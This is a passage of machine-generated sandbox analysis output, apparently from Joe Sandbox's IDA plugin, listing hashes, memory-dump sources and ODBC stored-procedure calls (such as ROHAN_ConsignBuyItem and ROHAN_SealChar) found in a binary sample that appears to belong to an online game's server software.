                                                                                      • Opcode ID: 15dc34091effab0c41741aaca6e12b9bdb98a15950dcb6229c8360f275cd9b96
                                                                                      • Instruction ID: ed66851c81fc011b9e920ea3fa5dc35865ab5acaa8c5f1d6c81b8320e8803140
                                                                                      • Opcode Fuzzy Hash: 15dc34091effab0c41741aaca6e12b9bdb98a15950dcb6229c8360f275cd9b96
                                                                                      • Instruction Fuzzy Hash: 6131E1B1A44208BBEB14DF94DC92FAE7775EB84B28F208209F7207F3C5D6B568408758
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetGambleMoney2]( ?,?,?)},000000FD), ref: 0043D531
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043D570
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043D5A8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,00000014,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043D5DD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FE,000000FD,00000014), ref: 0043D615
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetGambleMoney2]( ?,?,?)}, xrefs: 0043D528
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetGambleMoney2]( ?,?,?)}
                                                                                      • API String ID: 0-2805124159
                                                                                      • Opcode ID: 57f3e5cac2a3372695f6a9700e569697f4263fee6f955fc0f399f95cd0360425
                                                                                      • Instruction ID: bf9cff5608ef1b585c86b21dcdde8e62dac46f5ba7f24ad83cb1ed8bbe4c5c81
                                                                                      • Opcode Fuzzy Hash: 57f3e5cac2a3372695f6a9700e569697f4263fee6f955fc0f399f95cd0360425
                                                                                      • Instruction Fuzzy Hash: D73101B0644698ABEB20CF44CC52FEF7376EB84714F108289F7586A2C5D6F569C08F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_RemoveAttachedMoney](?, ?, ?)},000000FD), ref: 0043F5BC
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043F607
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043F63F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F674
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043F6AC
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_RemoveAttachedMoney](?, ?, ?)}, xrefs: 0043F5B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_RemoveAttachedMoney](?, ?, ?)}
                                                                                      • API String ID: 0-1065552579
                                                                                      • Opcode ID: ec096a5e3edf796cccf4e1b255dcf6b54f283b489324aed43ce0c785235a247b
                                                                                      • Instruction ID: 7c0a13b739036ca219e198df99208837a47619130adef06b7ea99b720d1de2c0
                                                                                      • Opcode Fuzzy Hash: ec096a5e3edf796cccf4e1b255dcf6b54f283b489324aed43ce0c785235a247b
                                                                                      • Instruction Fuzzy Hash: 9331F2716C4214BBEB289F54CC52FE973B4EB84718F2042C9F7146E7C5C6B26D408B98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ConsignBuyItem] (?,?,?)},000000FD), ref: 004308D0
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043090F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00430944
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043097C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000EE,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004309B4
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ConsignBuyItem] (?,?,?)}, xrefs: 004308C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ConsignBuyItem] (?,?,?)}
                                                                                      • API String ID: 0-1618429283
                                                                                      • Opcode ID: a0c08f0a0861b1fa1bac3eb7d36e69463a6601562c36133a57805faca9450a52
                                                                                      • Instruction ID: 8bb5f13fd16475f236c746042aaf92fe37ee0929879be0f81cb3072ce233f5a9
                                                                                      • Opcode Fuzzy Hash: a0c08f0a0861b1fa1bac3eb7d36e69463a6601562c36133a57805faca9450a52
                                                                                      • Instruction Fuzzy Hash: 843114B0E48714ABEB608F44CD42FA97375EB84B18F208285F71D6E2C4D5BA7980CF59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_UpdateBlockRemark] (?,?,?)},000000FD), ref: 0043299A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004329D9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00432A0E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00432A46
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000028,00000000,?,00000029,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00432A7E
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_UpdateBlockRemark] (?,?,?)}, xrefs: 00432991
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_UpdateBlockRemark] (?,?,?)}
                                                                                      • API String ID: 0-2683653987
                                                                                      • Opcode ID: 3c5376c86f087b8acee24a4fe40b2b2d2950ea616b310fe830acf48fd1f1c941
                                                                                      • Instruction ID: 892fe213ac9609f133f89e038fa6c20902390722aebafd857ff59a2d42bc7e06
                                                                                      • Opcode Fuzzy Hash: 3c5376c86f087b8acee24a4fe40b2b2d2950ea616b310fe830acf48fd1f1c941
                                                                                      • Instruction Fuzzy Hash: CA31F2B0641314ABFB248F44CC52FAA7375EBC4B28F104189F71C6E2C6D5B16D418F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_SealChar](?,?,?)} ,000000FD), ref: 0042BAEA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042BB29
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042BB5E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042BB96
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042BBCE
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_SealChar](?,?,?)} , xrefs: 0042BAE1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_SealChar](?,?,?)}
                                                                                      • API String ID: 0-355313852
                                                                                      • Opcode ID: 9f564ed6b95daa0f21db3db2a0f30713ebdbb64e4a58e69d61c5639131924d62
                                                                                      • Instruction ID: 8b5f713131a0f6ec4051781b248207b4ef8e3e2a6bd8a7c22a853af9910c2632
                                                                                      • Opcode Fuzzy Hash: 9f564ed6b95daa0f21db3db2a0f30713ebdbb64e4a58e69d61c5639131924d62
                                                                                      • Instruction Fuzzy Hash: 6F31E0F164421DABEB24CF54CC52FE97378EB84714F208299F7246E2C1D6B16AC08B6D
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_ConsignAddMoney] (?,?,?)},000000FD), ref: 00430AC6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00430B05
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00430B3A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00430B72
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00430BAA
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_ConsignAddMoney] (?,?,?)}, xrefs: 00430ABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_ConsignAddMoney] (?,?,?)}
                                                                                      • API String ID: 0-3466493713
                                                                                      • Opcode ID: 1dad14097ad65432a00b17efcb710dedb8e34fd4d17f7bc5b5f1161ad6094411
                                                                                      • Instruction ID: 54df86a35b2b259f13a6b4f78ba0f109b492d70faec1cbdab3e4f72e274e5f28
                                                                                      • Opcode Fuzzy Hash: 1dad14097ad65432a00b17efcb710dedb8e34fd4d17f7bc5b5f1161ad6094411
                                                                                      • Instruction Fuzzy Hash: 69310371E882146BEB608F44CC56F9A7374EB84714F20C289F61C6B2C5DDB979808F59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [EXTERN_SetOptionKeyInfo](?,?,?)},000000FD), ref: 00436B41
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00436B80
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00436BB5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00436BED
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,00000018,00000000,?,00000000,?,?,00000000,00000001,000000F1,00000005,00000000), ref: 00436C2A
                                                                                      Strings
                                                                                      • {? = CALL [EXTERN_SetOptionKeyInfo](?,?,?)}, xrefs: 00436B38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
